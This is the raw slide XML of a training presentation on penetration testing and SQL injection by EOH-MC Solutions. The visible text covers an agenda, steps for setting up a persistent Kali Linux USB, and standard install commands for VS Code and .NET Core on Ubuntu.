                <a:gd name="T4" fmla="*/ 60 w 174"/>
                <a:gd name="T5" fmla="*/ 0 h 126"/>
                <a:gd name="T6" fmla="*/ 174 w 174"/>
                <a:gd name="T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6">
                  <a:moveTo>
                    <a:pt x="174" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="126"/>
                    <a:pt x="58" y="126"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="85"/>
                    <a:pt x="39" y="45"/>
                    <a:pt x="60" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="54"/>
                    <a:pt x="119" y="97"/>
                    <a:pt x="174" y="126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3692" y="1369"/>
              <a:ext cx="196" cy="214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 83 w 83"/>
                <a:gd name="T1" fmla="*/ 90 h 90"/>
                <a:gd name="T2" fmla="*/ 0 w 83"/>
                <a:gd name="T3" fmla="*/ 90 h 90"/>
                <a:gd name="T4" fmla="*/ 41 w 83"/>
                <a:gd name="T5" fmla="*/ 0 h 90"/>
                <a:gd name="T6" fmla="*/ 83 w 83"/>
                <a:gd name="T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0">
                  <a:moveTo>
                    <a:pt x="83" y="90"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="90"/>
                    <a:pt x="28" y="90"/>
                    <a:pt x="0" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="26" y="33"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="32"/>
                    <a:pt x="69" y="60"/>
                    <a:pt x="83" y="90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14" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-99" y="70"/>
            <a:ext cx="5973724" cy="3478898"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4377580 w 7012356"/>
              <a:gd name="connsiteY0" fmla="*/ 2344372 h 3782205"/>
              <a:gd name="connsiteX1" fmla="*/ 5223886 w 7012356"/>
              <a:gd name="connsiteY1" fmla="*/ 2344372 h 3782205"/>
              <a:gd name="connsiteX2" fmla="*/ 5223886 w 7012356"/>
              <a:gd name="connsiteY2" fmla="*/ 3540874 h 3782205"/>
              <a:gd name="connsiteX3" fmla="*/ 4377580 w 7012356"/>
              <a:gd name="connsiteY3" fmla="*/ 3540874 h 3782205"/>
              <a:gd name="connsiteX4" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 3782205"/>
              <a:gd name="connsiteX5" fmla="*/ 7012356 w 7012356"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 3782205"/>
              <a:gd name="connsiteX6" fmla="*/ 1173936 w 7012356"/>
              <a:gd name="connsiteY6" fmla="*/ 3782205 h 3782205"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 7012356"/>
              <a:gd name="connsiteY7" fmla="*/ 3025901 h 3782205"/>
              <a:gd name="connsiteX8" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 3782205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025901 h 4083762"/>
              <a:gd name="connsiteX9" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 4083762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599833 h 4083762"/>
              <a:gd name="connsiteX9" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 4083762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599833 h 4083762"/>
              <a:gd name="connsiteX9" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX0" fmla="*/ 4377580 w 7012356"/>
              <a:gd name="connsiteY0" fmla="*/ 3540874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131 w 7012356"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX5" fmla="*/ 7012356 w 7012356"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX6" fmla="*/ 736191 w 7012356"/>
              <a:gd name="connsiteY6" fmla="*/ 4083762 h 4083762"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 7012356"/>
              <a:gd name="connsiteY7" fmla="*/ 3599833 h 4083762"/>
              <a:gd name="connsiteX8" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX0" fmla="*/ 4377580 w 7012356"/>
              <a:gd name="connsiteY0" fmla="*/ 3540874 h 4083762"/>
              <a:gd name="connsiteX1" fmla="*/ 5223886 w 7012356"/>
              <a:gd name="connsiteY1" fmla="*/ 3540874 h 4083762"/>
              <a:gd name="connsiteX2" fmla="*/ 4377580 w 7012356"/>
              <a:gd name="connsiteY2" fmla="*/ 3540874 h 4083762"/>
              <a:gd name="connsiteX3" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX4" fmla="*/ 7012356 w 7012356"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX5" fmla="*/ 736191 w 7012356"/>
              <a:gd name="connsiteY5" fmla="*/ 4083762 h 4083762"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7012356"/>
              <a:gd name="connsiteY6" fmla="*/ 3599833 h 4083762"/>
              <a:gd name="connsiteX7" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX0" fmla="*/ 4406763 w 7012356"/>
              <a:gd name="connsiteY0" fmla="*/ 3550601 h 4083762"/>
              <a:gd name="connsiteX1" fmla="*/ 5223886 w 7012356"/>
              <a:gd name="connsiteY1" fmla="*/ 3540874 h 4083762"/>
              <a:gd name="connsiteX2" fmla="*/ 4406763 w 7012356"/>
              <a:gd name="connsiteY2" fmla="*/ 3550601 h 4083762"/>
              <a:gd name="connsiteX3" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX4" fmla="*/ 7012356 w 7012356"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 4083762"/>
              <a:gd name="connsiteX5" fmla="*/ 736191 w 7012356"/>
              <a:gd name="connsiteY5" fmla="*/ 4083762 h 4083762"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7012356"/>
              <a:gd name="connsiteY6" fmla="*/ 3599833 h 4083762"/>
              <a:gd name="connsiteX7" fmla="*/ 131 w 7012356"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 408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2356" h="4083762">
                <a:moveTo>
                  <a:pt x="4406763" y="3550601"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5223886" y="3540874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406763" y="3550601"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="131" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7012356" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736191" y="4083762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3599833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="2591199"/>
                  <a:pt x="87" y="1008633"/>
                  <a:pt x="131" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:alpha val="6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5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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63902" y="496933"/>
            <a:ext cx="4185259" cy="4064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prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A client-centric approach, passion for technology &amp; innovation that will drive real value into your business.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRP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60468" y="69642"/>
            <a:ext cx="3624640" cy="533385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="1219444" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="1" kern="1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999" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white">
                    <a:lumMod val="95000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>EOH-MC Solutions</a:t>
            </a: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 rot="5400000" flipH="1">
            <a:off x="-94444" y="3157211"/>
            <a:ext cx="822495" cy="633607"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="55000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l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">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="100" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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488" y="1074446"/>
            <a:ext cx="5976664" cy="1279546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3634" y="3742383"/>
            <a:ext cx="5976664" cy="1279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ZA" dirty="0"/>
              <a:t>Presented By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Pieter Myburgh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25396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/>
      <p:bldP spid="16" grpId="0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57" y="3084807"/>
            <a:ext cx="2915960" cy="1135757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Rufus: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080" y="386789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7. Click Ok.</a:t>
            </a:r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3923928" y="4037171"/>
            <a:ext cx="1368152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295" y="1341062"/>
            <a:ext cx="2915022" cy="161061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292080" y="2613119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6. Click Ok.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067944" y="2783800"/>
            <a:ext cx="1224136" cy="3974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32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51970"/>
            <a:ext cx="4644181" cy="31974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4128" y="336383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1. Choose the flash drive.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4127" y="4129334"/>
            <a:ext cx="328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2. Right Click and choose</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Move/Resize.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851920" y="3533115"/>
            <a:ext cx="1872208" cy="76682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2040" y="4299942"/>
            <a:ext cx="792087" cy="36004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5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056" y="264375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3. Resize current partition to 4GB.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6056" y="4360454"/>
            <a:ext cx="3281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4. Click Ok.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78402"/>
            <a:ext cx="3990430" cy="304623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1763688" y="2813035"/>
            <a:ext cx="3312368" cy="4674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>
            <a:off x="3779912" y="4529731"/>
            <a:ext cx="129614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7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6592" y="359314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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>. Choose the Unallocated Partition.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6592" y="4049648"/>
            <a:ext cx="3549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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>Click Create and accept the warning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA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62337"/>
            <a:ext cx="4367672" cy="2853629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3635896" y="3762419"/>
            <a:ext cx="1490696" cy="33049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4644008" y="4218925"/>
            <a:ext cx="482584" cy="981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5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6592" y="2088014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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>. Enter these options:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>· Create as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>Primary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>· File System: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>Ext4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>· Partition Label: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>.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6592" y="4491593"/>
            <a:ext cx="347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8. Click Ok.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7654"/>
            <a:ext cx="3363688" cy="317390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028692" y="2626623"/>
            <a:ext cx="1105908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3203848" y="4660870"/>
            <a:ext cx="1922744" cy="30635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08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32066"/>
            <a:ext cx="5472608" cy="3040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41136" y="1851670"/>
            <a:ext cx="1325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/>
              <a:t>8. Click Apply.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1043608" y="2020947"/>
            <a:ext cx="5297528" cy="40678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816615"/>
            <a:ext cx="4248472" cy="13297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41136" y="3231716"/>
            <a:ext cx="113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/>
              <a:t>9. Click Yes.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3275856" y="3400993"/>
            <a:ext cx="3065280" cy="538909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76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9662"/>
            <a:ext cx="3426165" cy="29161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3175" y="177966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10. Wait for the operation to complete.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3175" y="2691764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11. When done, close the application and reboot your PC to boot from the flash drive.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63175" y="3513936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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depending on your PC’s bios settings you may need to press a function key during boot to boot from the flash drive.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28121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Setting up persistence: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Kali Linux.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8064" y="1707654"/>
            <a:ext cx="3456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To boot Kali Linux ensure the Live (amd64) option is selected and hit Enter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="Image result for kali linux 2016 boot options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77" y="1707654"/>
            <a:ext cx="4415675" cy="327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445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Setting up persistence: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Kali Linux.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2944" y="1135152"/>
            <a:ext cx="394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Open a terminal and type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>fdisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t> -l</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://img.wonderhowto.com/img/original/92/48/63568779213269/0/6356877921326992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7655"/>
            <a:ext cx="3888432" cy="263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12943" y="2194137"/>
            <a:ext cx="441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Mount the partition on the directory you made (don't click the desktop icon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>labeled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t> persistence!)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>mount /dev/sdc2 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>my_usb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2944" y="1584727"/>
            <a:ext cx="4279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Make a directory on the filesystem to mount your USB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t> -p /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>my_usb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2943" y="3025134"/>
            <a:ext cx="427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Add a configuration file to enable persistence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>echo "/ union" &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>my_usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>persistence.conf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6822" y="3640180"/>
            <a:ext cx="4176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Unmount the partition and reboot</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>umount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t> /dev/sdc2 &amp;&amp; reboot</a:t>
            </a:r>
            <a:endParaRPr lang="en-Z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Setting up persistence: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Kali Linux.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7874" y="1635646"/>
            <a:ext cx="3456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Now, if you boot up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>Live USB Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>, you'll be able to save your files and be able to retrieve them anywhere you plug it in to boot Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA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4" descr="Image result for kali linux 2016 boot options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25" y="1685777"/>
            <a:ext cx="4392149" cy="32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23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Penetration Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>OWASP top 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Create a bootable penetration testing USB drive from Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Get Visual Studio Code running on Ubuntu Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Install .NET Core on Ubuntu Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Host a asp.net core website on Ubuntu Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Demonstrate SQL injection on the hosted website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Securing the website against SQL injections.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Agenda:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012008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For Ubuntu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Download VS Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://code.visualstudio.com/Download</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Get Visual Studio Code running on Ubuntu Linux.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139702"/>
            <a:ext cx="5052513" cy="253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83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Once downloaded open a Terminal in the download location and type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Supply your password if asked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Get Visual Studio Code running on Ubuntu Linux.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06785"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="899592" y="175423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6578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sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" dirty="0" err="1"/>
                        <a:t>dpkg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" dirty="0"/>
                        <a:t> –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" dirty="0" err="1"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" dirty="0"/>
                        <a:t> code_1.7.1-1478180561_amd64.deb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0995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49688"/>
            <a:ext cx="2500431" cy="16934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433" y="2507192"/>
            <a:ext cx="4086225" cy="245268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878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Install .NET Core: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.microsoft.com/net/core#Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>In a terminal type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Install .NET Core on Linux.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16285"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1331640" y="2139702"/>
          <a:ext cx="6912768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3663278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kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> -c 'echo "deb [arch=amd64] https://apt-mo.trafficmanager.net/repos/dotnet-release/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>xenial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> main" &gt; /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/apt/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sources.list.d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>dotnetdev.list</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>‘</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> apt-key </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>adv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>keyserver</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> apt-mo.trafficmanager.net --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>recv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-keys 417A0893</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ZA" sz="1600" kern="1200" dirty="0">
